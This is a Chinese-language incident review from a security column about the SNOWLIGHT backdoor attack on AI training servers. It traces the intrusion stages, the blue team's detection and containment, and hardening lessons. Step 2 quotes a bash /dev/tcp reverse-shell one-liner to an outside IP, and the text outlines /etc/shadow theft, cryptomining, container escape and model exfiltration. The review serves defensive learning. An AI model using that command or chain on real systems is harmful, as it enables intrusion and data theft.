攻防实战复盘
SNOWLIGHT投毒:AI服务器爆破链
2026年09月27日 · 周日
真实攻击复盘 高级
场景:2026年9月,某跨境电商企业AI推理服务器集群遭异常外联告警。安全团队介入后发现,攻击者通过SSH爆破与Web漏洞双路径植入SNOWLIGHT后门,目标直指训练数据与模型资产。
攻击 / 事件时间线
1
初始访问:双路径突破边界
攻击者对暴露在公网的AI训练平台发起组合攻击:一方面利用SSH弱口令对22端口实施高频爆破,成功命中一台运维跳板机;另一方面利用该平台未修复的FastAPI路径穿越漏洞(CVE-2026-XXXX),通过/api/v1/export接口读取任意文件,获取/etc/shadow哈希后离线破解。两条路径均指向同一内网VPC,攻击者选择以Web漏洞路径作为主通道,SSH跳板作为备用持久化据点。
HydraCVE-2026-XXXX PoCHashcat
2
执行:SNOWLIGHT落地与反弹Shell
攻击者通过漏洞注入bash -i >& /dev/tcp/185.xx.xx.xx/443 0>&1反弹Shell,随后从C2下载SNOWLIGHT脚本。该脚本为Linux Bash类型,内置环境检测逻辑,识别到nvidia-smi与CUDA环境后判定为AI服务器,随即执行第二阶段载荷:部署XMRig挖矿模块并扫描内网6379/Redis与2375/Docker端口,为横向移动铺路。
SNOWLIGHTXMRigNmap
3
横向移动:容器逃逸与模型窃取
利用跳板机上的Kubernetes kubelet未授权访问(10250端口),攻击者创建特权Pod挂载宿主机根目录,实现容器逃逸。随后定位到模型存储卷/mnt/models/,打包PyTorch模型文件与训练数据集,通过rclone上传至境外对象存储。同时在内网部署frp反向代理,建立隐蔽隧道以备长期驻留。
kubelet APIrclonefrp
4
告警触发:异常外联暴露行踪
SOC平台在凌晨2:17捕获到跳板机向185.xx.xx.xx:443的持续TLS心跳,流量特征与SNOWLIGHT已知C2指纹匹配。EDR同步检测到rclone进程异常读取模型目录,触发数据外传规则。蓝队立即启动应急响应,隔离受影响节点并冻结相关AK/SK凭证。
SuricataEDRYARA
蓝队视角 · 发现与处置
SOC值班人员发现告警后,首先通过Sysmon日志回溯进程链,确认bash → SNOWLIGHT → XMRig的恶意执行路径,并提取C2 IP与域名。利用YARA规则扫描全网主机,发现另外3台AI服务器存在相同后门。蓝队随即执行:①隔离受控节点并重置所有SSH密钥;②封禁C2 IP与端口;③对K8s集群启用RBAC与NetworkPolicy;④通过Velociraptor对全集群进行取证采集,确认数据外传范围。整个处置在4小时内完成,未造成模型数据二次泄露。
涉及关键技术 / 工具
SNOWLIGHT Bash后门的环境感知与多阶段载荷投递Kubernetes kubelet未授权访问导致的容器逃逸基于YARA与Sysmon的进程链回溯与全网狩猎
防护经验总结
  • 对AI训练服务器禁用SSH密码登录,强制使用ed25519密钥+fail2ban,并将管理端口限制在堡垒机IP白名单内。
  • Kubernetes集群必须启用kubelet认证与NodeRestriction准入控制,禁止privileged容器,并通过NetworkPolicy限制Pod间东西向流量。
  • 部署针对AI资产的外联监控规则,对rclone、frp、XMRig等工具建立进程行为基线,结合Suricata自定义规则检测SNOWLIGHT C2心跳特征。
#SNOWLIGHT#AI服务器#容器逃逸#供应链攻击#应急响应
数据安全早知道 · 攻防实战专栏
⚠️ 免责声明
本文内容源自公开披露的安全事件或高仿真模拟场景,所有涉及的组织、系统、技术细节均经过脱敏处理,仅供安全学习与交流参考,不构成任何技术指导或合规建议。
数安早知道
🔗 数据安全与信息安全知识库 datasafe.website
— 点击上方链接访问知识库,获取更多安全资讯 —